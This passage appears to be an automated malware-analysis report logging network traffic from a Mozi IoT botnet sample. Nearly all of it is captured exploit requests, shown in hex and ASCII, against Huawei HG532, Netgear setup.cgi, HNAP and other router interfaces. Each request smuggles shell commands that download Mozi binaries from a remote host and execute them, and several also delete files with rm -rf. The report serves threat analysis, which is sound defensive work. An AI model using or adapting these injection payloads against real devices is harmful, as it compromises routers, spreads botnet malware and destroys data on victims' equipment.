69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 197.48.190.105:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 100.215.73.157:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 167.242.62.228:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 82.182.64.86:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 196.204.108.175:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 201.55.12.42:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 71.11.117.173:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 171.177.75.220:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo 